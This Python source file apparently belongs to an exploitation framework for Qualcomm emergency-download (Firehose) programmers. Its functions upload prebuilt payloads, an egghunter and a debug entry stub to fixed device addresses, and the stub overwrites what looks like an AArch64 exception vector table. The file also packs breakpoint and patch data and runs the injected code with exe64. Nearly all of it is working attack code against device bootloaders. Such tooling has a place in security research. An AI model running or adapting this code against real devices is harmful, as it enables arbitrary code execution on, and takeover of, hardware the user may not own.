def upload_fh():
    """Send the prebuilt ``fh64.payload`` file to the current target.

    The destination is the ``fh_base_programmer`` address of the object
    returned by ``t.get()``. The payload path is relative, so the result
    depends on the working directory the tool is started from.

    Returns:
        None.
    """
    device = t.get()
    payload_path = "../device/build/fh64.payload"
    FH_FW.sendfile(payload_path, device.fh_base_programmer)
    # A disabled alternative in the original read the same file in "rb" mode,
    # wrapped the bytes in XMLHunter(data, fh_base_programmer, target) and
    # called .send() on it instead of using FH_FW.sendfile directly.
def hook_handlers():
    """Write ``dbgentry64.payload`` into 16 consecutive 0x80-byte slots.

    The slots start at the hard-coded address 0xf803f000. The slot index is
    logged before each transfer.
    NOTE(review): 16 entries spaced 0x80 apart matches the layout of an
    AArch64 exception vector table; confirm that this is what the fixed
    address refers to on the supported target.
    """
    # The return value is not used here; the call is kept because the
    # original makes it and it may have side effects.
    t.get()
    I("Hooking handlers")

    slot_base = 0xf803f000
    slot_stride = 0x80
    entry_payload = "../device/build/dbgentry64.payload"
    for slot in xrange(16):
        I("%d" % slot)
        FH_FW.sendfile(entry_payload, slot_base + slot * slot_stride)
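def upload_fh_data():
    """Pack the Firehorse data blob and send it to the target's scratch area.

    Steps, as visible in this function:
      1. Build a BreakpointManager over the target's PBL basic-block database
         and an empty PatchManager. No breakpoints or patches are registered
         here; the example calls below are commented out.
      2. Build a PageCopy in MODE_PBL with an empty source page set and a
         fixed list of target pages.
      3. Pack everything with Firehorse.pack(), write the result to
         ``../tmp/fh.bin`` and send that file to
         ``fh_base_programmer + fh_scratch_offset``.

    The output path is relative and fixed: it depends on the working
    directory, and every run overwrites the previous blob.

    Returns:
        None.
    """
    target = t.get()

    bbdb = BasicBlocks(target.basicblocks_db_pbl)
    bpm = BreakpointManager(bbdb)
    # Disabled examples of registering breakpoints:
    #bpm.bp_programmer(0xF801DAFC, msg="peek0")
    #bpm.bp_programmer(0xF801DA08, msg="poke")

    pm = PatchManager()
    # Disabled example of registering a 32-bit patch:
    # pm.patch32_programmer(0x1402C958, 0xFFFFFFFF)

    I('applying patches and breakpoints...')
    I('creating pagecopy...')
    # Left empty on purpose in the original; logged so the operator can see it.
    pages = set()
    I('pages: ' + str(pages))
    pc = PageCopy(MODE_PBL, target.pbl_base_addr, target.pbl_copy_addr, pages,
                  target_pages=[
                      0x807D000, 0x807E000, 0x807F000, 0x807C000,
                      0x8068000, 0x806e000, 0x807B000,
                  ])

    I('uploading firehorse data...')
    fh = Firehorse(pm, bpm, pc)
    fhdata = fh.pack()

    # The context manager closes (and flushes) the file even if write()
    # raises, so sendfile never picks up a half-written or still-open file.
    blob_path = "../tmp/fh.bin"
    with open(blob_path, "wb") as fhbin:
        fhbin.write(fhdata)

    FH_FW.sendfile(blob_path, target.fh_base_programmer + target.fh_scratch_offset)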
def upload_init64():
    """Send ``init64.payload`` to the target's programmer base and run it.

    The file is written to ``fh_base_programmer`` of the object returned by
    ``t.get()``, then ``FH_FW.exe64`` is called with that same address.
    NOTE(review): exe64 presumably starts 64-bit execution at the given
    address; confirm against FH_FW. The sendfile result is not checked
    before exe64 is called.
    """
    device = t.get()
    init_payload = "../device/build/init64.payload"
    FH_FW.sendfile(init_payload, device.fh_base_programmer)
    FH_FW.exe64(device.fh_base_programmer)
def upload_xmlhunter(self):
    """Send ``xmlhunt.payload`` to ``self.target.egghunter_base``.

    Logs the destination address, transfers the file, then sets the
    class-level flag ``XMLHunter.uploaded``. The flag is set as soon as
    sendfile returns; its result is not inspected here.
    """
    notice = 'uploading xmlhunter to %08x' % self.target.egghunter_base
    I(notice)
    hunter_payload = "../device/build/xmlhunt.payload"
    FH_FW.sendfile(hunter_payload, self.target.egghunter_base)
    # Class attribute, so the flag is shared by every XMLHunter instance.
    XMLHunter.uploaded = True
def upload_egghunter(self):
    """Send ``dload.payload`` to ``self.target.egghunter_base``.

    Logs the destination address, transfers the file, then sets the
    class-level flag ``Egg.uploaded``. The flag is set as soon as sendfile
    returns; its result is not inspected here.
    """
    notice = 'uploading egghunter to %08x' % self.target.egghunter_base
    I(notice)
    hunter_payload = "../device/build/dload.payload"
    FH_FW.sendfile(hunter_payload, self.target.egghunter_base)
    # Class attribute, so the flag is shared by every Egg instance.
    Egg.uploaded = True